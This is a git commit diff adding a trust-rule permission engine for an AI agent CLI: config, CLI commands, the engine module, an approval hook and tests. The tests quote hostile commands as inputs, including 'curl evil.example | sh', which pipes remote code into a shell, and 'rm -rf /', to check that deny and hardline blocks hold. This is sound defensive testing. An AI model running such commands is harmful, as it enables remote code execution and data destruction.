Compare commits

...

1 Commits

Author SHA1 Message Date
teknium1
d948b0c00d feat(trust): rule-based permission engine with allow/deny/ask rules
Adds 'hermes trust' — a declarative permission layer that sits BEFORE
the --yolo bypass and BEFORE the dangerous-pattern detector.  Rules live
in ~/.hermes/trust.json and are matched by (tool, pattern, scope) with
priority / decision precedence.

Inspired by Vellum Assistant's Trust Rules v3 schema.

## Design

- A **deny** rule is a user-expressed invariant — it beats --yolo.
  (Hardline floor still wins over deny: irrecoverable commands are
  never allowed.)
- An **allow** rule short-circuits the dangerous-pattern check.
- An **ask** rule forces a prompt even under yolo.
- **No match** falls through to the existing flow unchanged.
- Opt-in: if trust.json is absent, behavior is identical to pre-engine.

Risk classifier reuses the existing dangerous-command detector (single
source of truth).  Threshold gate (approvals.auto_approve_up_to) controls
what auto-approves on no_match: none | low | medium | high.

## Changes
- tools/trust.py: engine (load/save/evaluate/explain/classify_risk)
- tools/approval.py: trust hook BEFORE yolo in check_dangerous_command
- hermes_cli/trust.py: CLI (list, add, remove, show, why, init)
- hermes_cli/main.py: argparse wiring + cmd_trust entrypoint
- hermes_cli/config.py: approvals.auto_approve_up_to default
- tests/tools/test_trust.py: 36 tests (matching, risk, threshold,
  persistence, approval integration incl. deny-beats-yolo +
  hardline-beats-allow)
- website/docs/user-guide/features/trust-engine.md: full docs + sidebar

## Validation

- tests/tools/test_trust.py                  → 36 passed
- tests/tools/ -k approval                    → 175 passed
- hermes trust init / list / why              → CLI works end-to-end

## Scope notes for reviewers

Currently hooks into the terminal approval path only.  File-tool
integration is a natural follow-up — the engine is already callable
from anywhere via evaluate_trust(tool=..., candidate=...).  Rule
'scope' requires the caller to pass a path; terminal doesn't, so
scope is only meaningful once file-tool integration lands.  Docs
call this out.
2026-05-07 13:20:29 -07:00
8 changed files with 1073 additions and 2 deletions

View File

@@ -1187,6 +1187,14 @@ DEFAULT_CONFIG = {
"mode": "manual",
"timeout": 60,
"cron_mode": "deny",
# Trust engine threshold — how much risk should auto-approve when
# no rule in trust.json matches. Levels:
# none — prompt on every flagged command
# low — auto-allow low-risk only (default)
# medium — auto-allow low + medium
# high — auto-allow everything (equivalent to yolo-except-hardline)
# Deny rules in trust.json always beat this threshold.
"auto_approve_up_to": "low",
# When true, /reload-mcp asks the user to confirm before rebuilding
# the MCP tool set for the active session. Reloading invalidates
# the provider prompt cache (tool schemas are baked into the system

View File

@@ -5239,12 +5239,19 @@ def cmd_cron(args):
def cmd_webhook(args):
"""Webhook subscription management."""
"""Entry point for 'hermes webhook' command."""
from hermes_cli.webhook import webhook_command
webhook_command(args)
def cmd_trust(args):
"""Entry point for 'hermes trust' command."""
from hermes_cli.trust import trust_command
trust_command(args)
def cmd_slack(args):
"""Slack integration helpers.
@@ -8070,6 +8077,7 @@ def _coalesce_session_name_args(argv: list) -> list:
"plugins",
"acp",
"webhook",
"trust",
"memory",
"dump",
"debug",
@@ -9265,6 +9273,53 @@ def main():
webhook_parser.set_defaults(func=cmd_webhook)
# =========================================================================
# trust command — rule-based permission engine
# =========================================================================
trust_parser = subparsers.add_parser(
"trust",
help="Manage trust rules — allow/deny/ask tool invocations without prompting",
description=(
"Trust rules live in ~/.hermes/trust.json and sit BEFORE the yolo bypass. "
"A deny rule is an invariant that even --yolo cannot override; an allow rule "
"short-circuits the dangerous-command check; an ask rule forces a prompt even "
"under yolo. See 'hermes trust why' to debug a specific invocation."
),
)
trust_subparsers = trust_parser.add_subparsers(dest="trust_action")
trust_subparsers.add_parser("list", aliases=["ls"], help="List all rules")
t_add = trust_subparsers.add_parser("add", help="Add a new rule")
t_add.add_argument("--id", default="", help="Rule id (auto-generated if omitted)")
t_add.add_argument("--tool", default="*", help="Tool name the rule applies to (or '*')")
t_add.add_argument("--pattern", default="*", help="fnmatch glob against the candidate string")
t_add.add_argument("--scope", default="everywhere",
help="Path prefix for file tools, or 'everywhere' (default)")
t_add.add_argument("--decision", required=True, choices=["allow", "deny", "ask"])
t_add.add_argument("--priority", type=int, default=50,
help="Higher priority wins; deny beats allow on ties (default: 50)")
t_rm = trust_subparsers.add_parser("remove", aliases=["rm"], help="Remove a rule by id")
t_rm.add_argument("id", help="Rule id")
t_show = trust_subparsers.add_parser("show", help="Show a single rule's full body")
t_show.add_argument("id", help="Rule id")
t_why = trust_subparsers.add_parser(
"why", help="Explain what would happen for a given (tool, command) pair"
)
t_why.add_argument("--tool", default="terminal", help="Tool name (default: terminal)")
t_why.add_argument("--cmd", required=True, help="Candidate string (shell command, file path, ...)")
t_init = trust_subparsers.add_parser(
"init", help="Seed a sensible starter bundle (git status / ls / file_read)"
)
t_init.add_argument("--force", action="store_true",
help="Overwrite an existing trust.json")
trust_parser.set_defaults(func=cmd_trust)
# =========================================================================
# kanban command — multi-profile collaboration board
# =========================================================================

178
hermes_cli/trust.py Normal file
View File

@@ -0,0 +1,178 @@
"""hermes trust — manage trust rules for tool invocations.
Subcommands:
hermes trust list # show all rules
hermes trust add --tool terminal --pattern 'git status*' --decision allow
hermes trust remove <rule-id>
hermes trust show <rule-id> # print one rule's full body
hermes trust why --tool <t> --cmd '<c>' # explain: what would happen?
hermes trust init # seed a sensible starter bundle
All rules persist to ~/.hermes/trust.json.
"""
from __future__ import annotations
import json
import re
import uuid
from typing import List
from hermes_constants import display_hermes_home
from tools.trust import TrustRule, explain, load_rules, save_rules
_ID_RE = re.compile(r"^[a-z0-9][a-z0-9_-]{0,63}$")
def trust_command(args) -> None:
sub = getattr(args, "trust_action", None)
if not sub:
print("Usage: hermes trust {list|add|remove|show|why|init}")
print("Run 'hermes trust --help' for details.")
return
if sub in ("list", "ls"):
_cmd_list(args)
elif sub == "add":
_cmd_add(args)
elif sub in ("remove", "rm"):
_cmd_remove(args)
elif sub == "show":
_cmd_show(args)
elif sub == "why":
_cmd_why(args)
elif sub == "init":
_cmd_init(args)
else:
print(f"Unknown trust subcommand: {sub}")
def _cmd_list(args) -> None:
rules = load_rules()
if not rules:
print("No trust rules configured.")
print()
print(f"File: {display_hermes_home()}/trust.json")
print("Add one with:")
print(" hermes trust add --tool terminal --pattern 'git status*' --decision allow")
return
print(f"{'ID':<28} {'TOOL':<14} {'DECISION':<8} {'PRIO':<5} PATTERN")
for rule in sorted(rules, key=lambda r: (-r.priority, r.id)):
print(
f"{rule.id:<28} {rule.tool:<14} {rule.decision:<8} {rule.priority:<5} "
f"{rule.pattern}"
)
def _cmd_add(args) -> None:
rule_id = (args.id or "").strip().lower()
if not rule_id:
rule_id = f"rule-{uuid.uuid4().hex[:8]}"
if not _ID_RE.match(rule_id):
print(f"Error: id must be lowercase alphanumerics + '-'/'_' (got {args.id!r})")
return
if args.decision not in ("allow", "deny", "ask"):
print(f"Error: --decision must be allow/deny/ask (got {args.decision!r})")
return
rules = load_rules()
if any(r.id == rule_id for r in rules):
print(f"Error: a rule with id '{rule_id}' already exists. Remove it first or pick another --id.")
return
new_rule = TrustRule(
id=rule_id,
tool=args.tool or "*",
pattern=args.pattern or "*",
scope=args.scope or "everywhere",
decision=args.decision,
priority=int(args.priority),
)
rules.append(new_rule)
save_rules(rules)
print(f"Added rule '{rule_id}':")
print(json.dumps(new_rule.__dict__, indent=2))
def _cmd_remove(args) -> None:
rule_id = args.id.strip().lower()
rules = load_rules()
kept = [r for r in rules if r.id != rule_id]
if len(kept) == len(rules):
print(f"No rule with id '{rule_id}' — nothing removed.")
return
save_rules(kept)
print(f"Removed rule '{rule_id}'.")
def _cmd_show(args) -> None:
rule_id = args.id.strip().lower()
for rule in load_rules():
if rule.id == rule_id:
print(json.dumps(rule.__dict__, indent=2))
return
print(f"No rule with id '{rule_id}'.")
def _cmd_why(args) -> None:
payload = explain(args.tool, args.cmd)
print(json.dumps(payload, indent=2))
# A readable summary under the JSON.
print()
print("Decision:")
winner = payload.get("winning_rule")
if winner:
print(
f"{winner['decision'].upper()} via rule '{winner['id']}' "
f"(priority {winner['priority']}, pattern {winner['pattern']!r})"
)
else:
risk = payload.get("risk")
thr = payload.get("threshold")
allowed = payload.get("threshold_allows_risk")
print(
f" ➜ no rule matched; risk={risk}, threshold={thr}"
f"{'auto-approved' if allowed else 'prompts'}"
)
def _cmd_init(args) -> None:
"""Seed a sensible starter bundle of read-only allow rules.
Intentionally minimal — users should review before relying on it.
Refuses to overwrite an existing trust.json.
"""
existing = load_rules()
if existing and not getattr(args, "force", False):
print(
f"Refusing to overwrite existing trust rules. Re-run with --force "
f"or inspect {display_hermes_home()}/trust.json first."
)
return
starter: List[TrustRule] = [
TrustRule(id="starter-allow-git-status", tool="terminal",
pattern="git status*", decision="allow", priority=50),
TrustRule(id="starter-allow-git-log", tool="terminal",
pattern="git log*", decision="allow", priority=50),
TrustRule(id="starter-allow-git-diff", tool="terminal",
pattern="git diff*", decision="allow", priority=50),
TrustRule(id="starter-allow-ls", tool="terminal",
pattern="ls*", decision="allow", priority=50),
TrustRule(id="starter-allow-cat-readonly", tool="terminal",
pattern="cat *", decision="allow", priority=50),
TrustRule(id="starter-allow-file-read", tool="file_read",
pattern="*", decision="allow", priority=50),
TrustRule(id="starter-allow-search-files", tool="search_files",
pattern="*", decision="allow", priority=50),
]
save_rules(starter)
print(f"Seeded {len(starter)} starter rule(s) to {display_hermes_home()}/trust.json.")
print("Inspect with 'hermes trust list'; remove any you don't want.")

304
tests/tools/test_trust.py Normal file
View File

@@ -0,0 +1,304 @@
"""Tests for tools/trust.py — rule loading, evaluation, risk classification."""
from __future__ import annotations
import json
from pathlib import Path
import pytest
from tools.trust import (
TrustDecision,
TrustRule,
_pick_winning_rule,
_threshold_allows,
classify_risk,
evaluate_trust,
explain,
load_rules,
save_rules,
)
@pytest.fixture
def trust_home(tmp_path, monkeypatch):
"""Isolated HERMES_HOME so each test starts with no trust rules."""
home = tmp_path / ".hermes"
home.mkdir()
monkeypatch.setenv("HERMES_HOME", str(home))
import importlib
import hermes_constants
importlib.reload(hermes_constants)
return home
class TestRuleMatching:
def test_tool_wildcard_matches_any_tool(self):
rule = TrustRule(id="r", tool="*", pattern="git*", decision="allow")
assert rule.matches(tool="terminal", candidate="git status")
assert rule.matches(tool="file_read", candidate="git status")
def test_tool_name_must_match_when_not_wildcard(self):
rule = TrustRule(id="r", tool="terminal", pattern="*", decision="allow")
assert rule.matches(tool="terminal", candidate="anything")
assert not rule.matches(tool="file_read", candidate="anything")
def test_pattern_is_fnmatch_glob(self):
rule = TrustRule(id="r", tool="terminal", pattern="git status*",
decision="allow")
assert rule.matches(tool="terminal", candidate="git status")
assert rule.matches(tool="terminal", candidate="git status -s")
assert not rule.matches(tool="terminal", candidate="git commit")
def test_case_insensitive_fallback(self):
"""Users writing 'Git Push' pattern should still match 'git push'."""
rule = TrustRule(id="r", tool="terminal", pattern="Git Push*", decision="allow")
assert rule.matches(tool="terminal", candidate="git push origin main")
def test_scope_path_prefix_enforced(self, tmp_path):
rule = TrustRule(id="r", tool="file_write", pattern="*",
scope=str(tmp_path / "allowed"), decision="allow")
(tmp_path / "allowed").mkdir()
(tmp_path / "other").mkdir()
assert rule.matches(
tool="file_write", candidate="anything", path=str(tmp_path / "allowed" / "f.txt"),
)
assert not rule.matches(
tool="file_write", candidate="anything", path=str(tmp_path / "other" / "f.txt"),
)
def test_scope_everywhere_ignores_path(self):
rule = TrustRule(id="r", tool="file_write", pattern="*",
scope="everywhere", decision="allow")
assert rule.matches(tool="file_write", candidate="x", path="/any/path")
class TestWinningRuleSelection:
def test_higher_priority_wins(self):
a = TrustRule(id="a", decision="allow", priority=10)
b = TrustRule(id="b", decision="deny", priority=100)
winner = _pick_winning_rule([a, b])
assert winner is b
def test_deny_beats_allow_on_priority_tie(self):
allow = TrustRule(id="a", decision="allow", priority=50)
deny = TrustRule(id="d", decision="deny", priority=50)
ask = TrustRule(id="k", decision="ask", priority=50)
winner = _pick_winning_rule([allow, ask, deny])
assert winner is deny
def test_ask_beats_allow_on_tie(self):
allow = TrustRule(id="a", decision="allow", priority=50)
ask = TrustRule(id="k", decision="ask", priority=50)
winner = _pick_winning_rule([allow, ask])
assert winner is ask
def test_no_matches_returns_none(self):
assert _pick_winning_rule([]) is None
class TestRiskClassification:
def test_read_only_tools_are_low_risk(self):
assert classify_risk("file_read", "/tmp/x") == "low"
assert classify_risk("web_search", "python") == "low"
assert classify_risk("search_files", "*.py") == "low"
def test_file_write_is_medium_risk(self):
assert classify_risk("file_write", "/tmp/x") == "medium"
assert classify_risk("patch", "something") == "medium"
def test_bash_benign_is_low(self):
assert classify_risk("terminal", "ls -la") == "low"
def test_bash_dangerous_is_high(self):
# rm -rf on a subdirectory is flagged dangerous by existing detector.
risk = classify_risk("terminal", "rm -rf /tmp/somepath")
assert risk == "high"
def test_unknown_tool_classifies_unknown(self):
assert classify_risk("some-custom-tool", "foo") == "unknown"
class TestThresholdGate:
def test_none_threshold_blocks_all_risks(self):
assert not _threshold_allows("low", "none")
assert not _threshold_allows("medium", "none")
assert not _threshold_allows("high", "none")
def test_low_threshold_allows_low_only(self):
assert _threshold_allows("low", "low")
assert not _threshold_allows("medium", "low")
assert not _threshold_allows("high", "low")
def test_medium_threshold_allows_low_and_medium(self):
assert _threshold_allows("low", "medium")
assert _threshold_allows("medium", "medium")
assert not _threshold_allows("high", "medium")
def test_high_threshold_allows_all(self):
assert _threshold_allows("low", "high")
assert _threshold_allows("medium", "high")
assert _threshold_allows("high", "high")
def test_unknown_risk_treated_as_medium(self):
assert not _threshold_allows("unknown", "low")
assert _threshold_allows("unknown", "medium")
class TestLoadSaveRules:
def test_missing_file_returns_empty_list(self, trust_home):
assert load_rules() == []
def test_round_trip_preserves_all_fields(self, trust_home):
rules = [
TrustRule(id="a", tool="terminal", pattern="git*",
scope="everywhere", decision="allow", priority=100),
TrustRule(id="b", tool="file_write", pattern="*.yml",
scope="/project", decision="deny", priority=200),
]
save_rules(rules)
loaded = load_rules()
assert len(loaded) == 2
assert loaded[0].id == "a"
assert loaded[1].decision == "deny"
assert loaded[1].scope == "/project"
def test_malformed_file_returns_empty_without_crashing(self, trust_home):
(trust_home / "trust.json").write_text("not valid json", encoding="utf-8")
assert load_rules() == []
def test_non_array_file_returns_empty(self, trust_home):
(trust_home / "trust.json").write_text('{"not": "a list"}', encoding="utf-8")
assert load_rules() == []
def test_invalid_decision_drops_only_that_rule(self, trust_home):
raw = json.dumps([
{"id": "ok", "decision": "allow"},
{"id": "bad", "decision": "nuke-the-site"},
{"id": "also-ok", "decision": "deny"},
])
(trust_home / "trust.json").write_text(raw, encoding="utf-8")
rules = load_rules()
assert [r.id for r in rules] == ["ok", "also-ok"]
class TestEvaluateTrust:
def test_empty_rules_returns_no_match(self, trust_home):
outcome = evaluate_trust(tool="terminal", candidate="anything")
assert outcome.decision == "no_match"
assert outcome.rule_id is None
def test_explicit_deny_wins(self, trust_home):
rules = [
TrustRule(id="allow-ls", tool="terminal", pattern="ls*",
decision="allow", priority=50),
TrustRule(id="deny-rm", tool="terminal", pattern="rm*",
decision="deny", priority=100),
]
outcome = evaluate_trust(tool="terminal", candidate="rm -f foo", rules=rules)
assert outcome.decision == "deny"
assert outcome.rule_id == "deny-rm"
def test_allow_matches_and_returns_rule_id(self, trust_home):
rules = [
TrustRule(id="allow-git-status", tool="terminal", pattern="git status*",
decision="allow", priority=50),
]
outcome = evaluate_trust(tool="terminal", candidate="git status -s", rules=rules)
assert outcome.decision == "allow"
assert outcome.rule_id == "allow-git-status"
def test_ask_rule_forces_prompt(self, trust_home):
rules = [
TrustRule(id="ask-git-push", tool="terminal", pattern="git push*",
decision="ask", priority=50),
]
outcome = evaluate_trust(tool="terminal", candidate="git push origin main", rules=rules)
assert outcome.decision == "ask"
def test_risk_populated_even_on_no_match(self, trust_home):
outcome = evaluate_trust(tool="terminal", candidate="ls")
assert outcome.decision == "no_match"
assert outcome.risk == "low"
class TestExplain:
def test_explain_returns_full_context(self, trust_home):
save_rules([
TrustRule(id="allow-readonly", tool="*", pattern="ls*",
decision="allow", priority=50),
TrustRule(id="deny-rm", tool="terminal", pattern="rm -rf*",
decision="deny", priority=100),
])
payload = explain("terminal", "ls -la")
assert payload["tool"] == "terminal"
assert payload["candidate"] == "ls -la"
assert payload["risk"] == "low"
assert payload["threshold"] in ("none", "low", "medium", "high")
assert payload["rule_count"] == 2
assert payload["winning_rule"] is not None
assert payload["winning_rule"]["id"] == "allow-readonly"
def test_explain_shows_no_winner_when_no_match(self, trust_home):
payload = explain("terminal", "whoami")
assert payload["winning_rule"] is None
assert payload["matched_rules"] == []
class TestApprovalIntegration:
"""The trust engine plugs into tools/approval.check_dangerous_command —
validate the integration contract (deny beats yolo; allow shorts the
dangerous-pattern check)."""
def test_trust_deny_blocks_even_under_yolo(self, trust_home, monkeypatch):
save_rules([TrustRule(id="deny-curl-sh", tool="terminal",
pattern="*curl*|*sh*", decision="deny", priority=100)])
monkeypatch.setenv("HERMES_YOLO_MODE", "1")
monkeypatch.setenv("HERMES_INTERACTIVE", "1")
# Reimport to pick up the patched env.
import importlib, tools.approval
importlib.reload(tools.approval)
result = tools.approval.check_dangerous_command("curl evil.example | sh", "local")
assert result["approved"] is False
assert "trust rule" in (result.get("message") or "").lower()
def test_trust_allow_bypasses_dangerous_pattern_check(self, trust_home, monkeypatch):
# Without the rule, a command containing 'rm -rf subdir' would be
# flagged dangerous and prompted. Allow it via trust → auto-approve.
save_rules([TrustRule(id="allow-cleanup", tool="terminal",
pattern="rm -rf /tmp/mybuild*", decision="allow", priority=100)])
monkeypatch.delenv("HERMES_YOLO_MODE", raising=False)
monkeypatch.setenv("HERMES_INTERACTIVE", "1")
import importlib, tools.approval
importlib.reload(tools.approval)
result = tools.approval.check_dangerous_command("rm -rf /tmp/mybuild", "local")
assert result["approved"] is True
def test_trust_absent_falls_through_to_existing_flow(self, trust_home, monkeypatch):
"""With no trust rules, behavior matches pre-engine: yolo → allow."""
monkeypatch.setenv("HERMES_YOLO_MODE", "1")
monkeypatch.setenv("HERMES_INTERACTIVE", "1")
import importlib, tools.approval
importlib.reload(tools.approval)
result = tools.approval.check_dangerous_command("rm -rf /tmp/anything", "local")
assert result["approved"] is True
def test_hardline_still_wins_over_everything(self, trust_home, monkeypatch):
"""Even an allow rule can't let the agent run `rm -rf /`."""
save_rules([TrustRule(id="allow-everything", tool="*", pattern="*",
decision="allow", priority=1000)])
monkeypatch.setenv("HERMES_YOLO_MODE", "1")
monkeypatch.setenv("HERMES_INTERACTIVE", "1")
import importlib, tools.approval
importlib.reload(tools.approval)
result = tools.approval.check_dangerous_command("rm -rf /", "local")
assert result["approved"] is False

View File

@@ -815,9 +815,50 @@ def check_dangerous_command(command: str, env_type: str,
logger.warning("Hardline block: %s (command: %s)", hardline_desc, command[:200])
return _hardline_block_result(hardline_desc)
# Trust engine: rule-based allow/deny/ask evaluated BEFORE yolo. A deny
# rule is a user-expressed invariant ("never let the agent run this, even
# under yolo") and must win over yolo. An allow rule short-circuits the
# pattern-based dangerous-command check. An ask rule forces a prompt
# even under yolo. If no rule matches, the existing flow continues
# unchanged. The engine is opt-in: if ~/.hermes/trust.json is absent,
# every call returns "no_match" and we fall through immediately.
try:
from tools.trust import evaluate_trust
trust_decision = evaluate_trust(tool="terminal", candidate=command)
except Exception as _trust_exc:
logger.debug("Trust engine disabled: %s", _trust_exc)
trust_decision = None
if trust_decision is not None:
if trust_decision.decision == "deny":
logger.warning(
"Trust rule %s blocked command: %s",
trust_decision.rule_id, command[:200],
)
return {
"approved": False,
"message": (
f"BLOCKED by trust rule '{trust_decision.rule_id}': "
f"this command is explicitly denied in trust.json."
),
}
if trust_decision.decision == "allow":
# Allow rule bypasses the dangerous-pattern check entirely.
# (Hardline floor above still applies — that's the only thing
# that cannot be overridden.)
return {"approved": True, "message": None}
# "ask" falls through and forces prompting: we skip the yolo
# bypass below by remembering the trust-initiated ask.
_trust_forced_ask = trust_decision.decision == "ask"
else:
_trust_forced_ask = False
# --yolo: bypass all approval prompts. Gateway /yolo is session-scoped;
# CLI --yolo remains process-scoped via the env var for local use.
if is_truthy_value(os.getenv("HERMES_YOLO_MODE")) or is_current_session_yolo_enabled():
if not _trust_forced_ask and (
is_truthy_value(os.getenv("HERMES_YOLO_MODE")) or is_current_session_yolo_enabled()
):
return {"approved": True, "message": None}
is_dangerous, pattern_key, description = detect_dangerous_command(command)

348
tools/trust.py Normal file
View File

@@ -0,0 +1,348 @@
"""Trust engine — rule-based approval/denial for tool invocations.
Inspired by Vellum Assistant's trust rules v3 schema. Sits BEFORE the
existing pattern-based dangerous-command detection and the yolo bypass:
tool invocation → evaluate_trust() → decision
├── deny rule matched → blocked (regardless of yolo)
├── allow rule matched → bypass prompt (subject to hardline floor)
├── ask rule matched → always prompt
└── no match → fall through to existing check_dangerous_command
The trust engine is **opt-in**. If ``~/.hermes/trust.json`` doesn't exist
and the config doesn't define any rules, every call returns ``"no_match"``
and the existing flow is unchanged.
Rule shape (stored as JSON list)::
{
"id": "allow-readonly-git",
"tool": "terminal",
"pattern": "git status*",
"scope": "everywhere",
"decision": "allow",
"priority": 100
}
- ``tool``: tool name (``terminal``, ``file_write``, ``file_read``, ...).
``*`` matches any tool.
- ``pattern``: fnmatch glob against the candidate string. Missing = ``*``.
- ``scope``: ``everywhere`` (default) or a filesystem path prefix. Only
enforced for file tools where the candidate includes a path.
- ``decision``: ``allow`` | ``deny`` | ``ask``.
- ``priority``: integer, higher wins. Denies beat allows on ties.
Risk classification uses the same dangerous-command detector already in
``tools/approval.py`` — we don't duplicate it, just interpret its output.
Threshold semantics (``approvals.auto_approve_up_to`` in config.yaml)::
none — every flagged command prompts (default for cron)
low — low-risk auto-allowed; medium/high prompt (default)
medium — low+medium auto-allowed; high prompts
high — everything auto-allowed
"""
from __future__ import annotations
import fnmatch
import json
import logging
import os
from dataclasses import asdict, dataclass, field
from pathlib import Path
from typing import Dict, List, Literal, Optional
from hermes_constants import get_hermes_home
logger = logging.getLogger(__name__)
_RULES_FILENAME = "trust.json"
# Valid rule decisions — parsed at load time, invalid rules are dropped with a warning.
_VALID_DECISIONS = frozenset({"allow", "deny", "ask"})
# Threshold levels (ordered ascending so we can compare via index).
_THRESHOLDS = ("none", "low", "medium", "high")
_RISK_LEVELS = ("low", "medium", "high")
@dataclass
class TrustRule:
"""One entry in ``trust.json``.
``scope`` / ``priority`` are optional with sensible defaults. Missing
optional fields on stored rules are filled in at load time.
"""
id: str
tool: str = "*"
pattern: str = "*"
scope: str = "everywhere"
decision: Literal["allow", "deny", "ask"] = "allow"
priority: int = 50
def matches(self, *, tool: str, candidate: str, path: Optional[str] = None) -> bool:
"""Does this rule apply to the given tool+candidate (+optional path)?
Matching is conservative: the tool must match (or the rule's tool is
``*``), the candidate must match the pattern, and if ``scope`` is a
filesystem prefix the ``path`` argument must start with it.
"""
if self.tool not in ("*", tool):
return False
if not fnmatch.fnmatchcase(candidate, self.pattern):
# Fallback to case-insensitive match — users frequently write
# "Git Push" style patterns.
if not fnmatch.fnmatch(candidate.lower(), self.pattern.lower()):
return False
if self.scope and self.scope != "everywhere" and path:
try:
# Normalize both sides so "./foo" / "foo" / "/abs/foo" compare sanely.
if not os.path.abspath(path).startswith(os.path.abspath(self.scope)):
return False
except (TypeError, ValueError):
return False
return True
@dataclass
class TrustDecision:
"""The outcome of a single ``evaluate_trust()`` call."""
decision: Literal["allow", "deny", "ask", "no_match"]
rule_id: Optional[str] = None
reason: str = ""
risk: Literal["low", "medium", "high", "unknown"] = "unknown"
matched: List[str] = field(default_factory=list)
def as_dict(self) -> Dict[str, object]:
return asdict(self)
# ---------------------------------------------------------------------------
# Persistence
# ---------------------------------------------------------------------------
def _rules_path() -> Path:
return get_hermes_home() / _RULES_FILENAME
def load_rules() -> List[TrustRule]:
"""Read ``trust.json`` and return a list of valid rules.
Silently tolerates a missing file (returns empty list). Logs a warning and
drops rules that don't parse — the engine should never crash user tooling
over a malformed file.
"""
path = _rules_path()
if not path.exists():
return []
try:
raw = json.loads(path.read_text(encoding="utf-8"))
except Exception as e:
logger.warning("trust.json parse error: %s; treating as empty", e)
return []
if not isinstance(raw, list):
logger.warning("trust.json must be a JSON array; got %s", type(raw).__name__)
return []
rules: List[TrustRule] = []
for i, entry in enumerate(raw):
if not isinstance(entry, dict):
logger.warning("trust.json rule #%d is not an object; skipping", i)
continue
try:
decision = str(entry.get("decision", "allow")).lower()
if decision not in _VALID_DECISIONS:
logger.warning(
"trust.json rule %r has invalid decision %r; skipping",
entry.get("id"), decision,
)
continue
rule = TrustRule(
id=str(entry.get("id") or f"rule-{i}"),
tool=str(entry.get("tool", "*")) or "*",
pattern=str(entry.get("pattern", "*")) or "*",
scope=str(entry.get("scope", "everywhere")) or "everywhere",
decision=decision, # type: ignore[arg-type]
priority=int(entry.get("priority", 50)),
)
rules.append(rule)
except (ValueError, TypeError) as e:
logger.warning("trust.json rule %r malformed: %s; skipping",
entry.get("id"), e)
return rules
def save_rules(rules: List[TrustRule]) -> None:
path = _rules_path()
path.parent.mkdir(parents=True, exist_ok=True)
tmp = path.with_suffix(".tmp")
tmp.write_text(
json.dumps([asdict(r) for r in rules], indent=2, ensure_ascii=False),
encoding="utf-8",
)
from utils import atomic_replace
atomic_replace(tmp, path)
# ---------------------------------------------------------------------------
# Evaluation
# ---------------------------------------------------------------------------
def _find_matching_rules(
rules: List[TrustRule], *, tool: str, candidate: str, path: Optional[str]
) -> List[TrustRule]:
return [r for r in rules if r.matches(tool=tool, candidate=candidate, path=path)]
def _pick_winning_rule(matched: List[TrustRule]) -> Optional[TrustRule]:
"""Highest priority wins; on ties, deny beats ask beats allow."""
if not matched:
return None
# Sort so the winner is first: by -priority, then deny<ask<allow order.
decision_order = {"deny": 0, "ask": 1, "allow": 2}
matched_sorted = sorted(
matched,
key=lambda r: (-int(r.priority), decision_order.get(r.decision, 99)),
)
return matched_sorted[0]
def classify_risk(tool: str, candidate: str) -> str:
"""Return ``"low" | "medium" | "high" | "unknown"`` for a tool invocation.
Reuses ``tools/approval.detect_dangerous_command`` for shell commands so
there is one source of truth for "is this shell action dangerous". Other
tools get a simple heuristic:
- ``file_read`` / ``read_file`` / ``search_files`` / ``web_search`` / ``web_extract``
/ ``browser_*`` nav → low (read-only / informational)
- ``file_write`` / ``patch`` / ``write_file`` → medium
- Anything else → unknown (treated as medium by the threshold gate)
"""
tool_key = (tool or "").lower()
if tool_key in ("terminal", "bash", "shell", "host_bash"):
try:
from tools.approval import detect_dangerous_command, detect_hardline_command
is_hard, _ = detect_hardline_command(candidate)
if is_hard:
return "high"
is_dangerous, _, _ = detect_dangerous_command(candidate)
return "high" if is_dangerous else "low"
except Exception:
# If the existing detector can't be imported for any reason,
# assume medium so we don't silently allow bad commands.
return "medium"
if tool_key in (
"file_read", "read_file", "search_files", "glob", "grep",
"list_directory", "web_search", "web_extract", "web_fetch",
):
return "low"
if tool_key.startswith("browser_") and "navigate" in tool_key:
return "low"
if tool_key in ("file_write", "write_file", "patch", "file_edit", "host_file_write"):
return "medium"
return "unknown"
def _threshold_allows(risk: str, threshold: str) -> bool:
"""Is ``risk`` at or below ``threshold``?"""
if threshold not in _THRESHOLDS:
threshold = "low"
if risk not in _RISK_LEVELS:
# Unknown risk: treat as medium for threshold purposes.
risk = "medium"
return _RISK_LEVELS.index(risk) <= _THRESHOLDS.index(threshold) - 1
def _read_threshold() -> str:
"""Resolve the ``auto_approve_up_to`` threshold from config.yaml (default 'low')."""
try:
from hermes_cli.config import load_config
cfg = load_config() or {}
approvals = cfg.get("approvals", {}) if isinstance(cfg, dict) else {}
threshold = str(approvals.get("auto_approve_up_to", "low")).lower()
except Exception:
return "low"
return threshold if threshold in _THRESHOLDS else "low"
def evaluate_trust(
*,
tool: str,
candidate: str,
path: Optional[str] = None,
rules: Optional[List[TrustRule]] = None,
threshold: Optional[str] = None,
) -> TrustDecision:
"""Evaluate tool+candidate against the configured trust rules.
``candidate`` is the rendered string to match against rule patterns
(typically the shell command for ``terminal``, or the file path for file
tools). ``path`` is an optional filesystem path used for the ``scope``
check; for ``terminal`` commands callers can leave it ``None``.
Return values:
- ``decision == "allow"`` / ``"deny"`` / ``"ask"``: a rule matched. The
caller MUST honor the decision. ``allow`` and ``ask`` are still
subject to the hardline floor in ``tools/approval.py`` — deny rules
in ``trust.json`` cannot grant permission to run ``rm -rf /``.
- ``decision == "no_match"``: no rule applied; the caller should fall
through to its existing approval logic. The ``risk`` field is still
populated so callers can make threshold-based decisions themselves.
"""
rules = rules if rules is not None else load_rules()
risk = classify_risk(tool, candidate)
matched = _find_matching_rules(rules, tool=tool, candidate=candidate, path=path)
winner = _pick_winning_rule(matched)
if winner is not None:
return TrustDecision(
decision=winner.decision,
rule_id=winner.id,
reason=f"rule {winner.id!r} (priority {winner.priority}) matched {tool}:{candidate!r}",
risk=risk, # type: ignore[arg-type]
matched=[r.id for r in matched],
)
return TrustDecision(
decision="no_match",
rule_id=None,
reason="no rule matched",
risk=risk, # type: ignore[arg-type]
matched=[],
)
def explain(tool: str, candidate: str, path: Optional[str] = None) -> Dict[str, object]:
"""Return a full explain payload — every matched rule plus threshold / risk.
Used by ``hermes trust why`` and by debug logging.
"""
rules = load_rules()
matched = _find_matching_rules(rules, tool=tool, candidate=candidate, path=path)
winner = _pick_winning_rule(matched)
threshold = _read_threshold()
risk = classify_risk(tool, candidate)
return {
"tool": tool,
"candidate": candidate,
"path": path,
"risk": risk,
"threshold": threshold,
"threshold_allows_risk": _threshold_allows(risk, threshold) if risk in _RISK_LEVELS else False,
"matched_rules": [asdict(r) for r in matched],
"winning_rule": (asdict(winner) if winner else None),
"rule_count": len(rules),
}

View File

@@ -0,0 +1,130 @@
---
title: Trust Engine
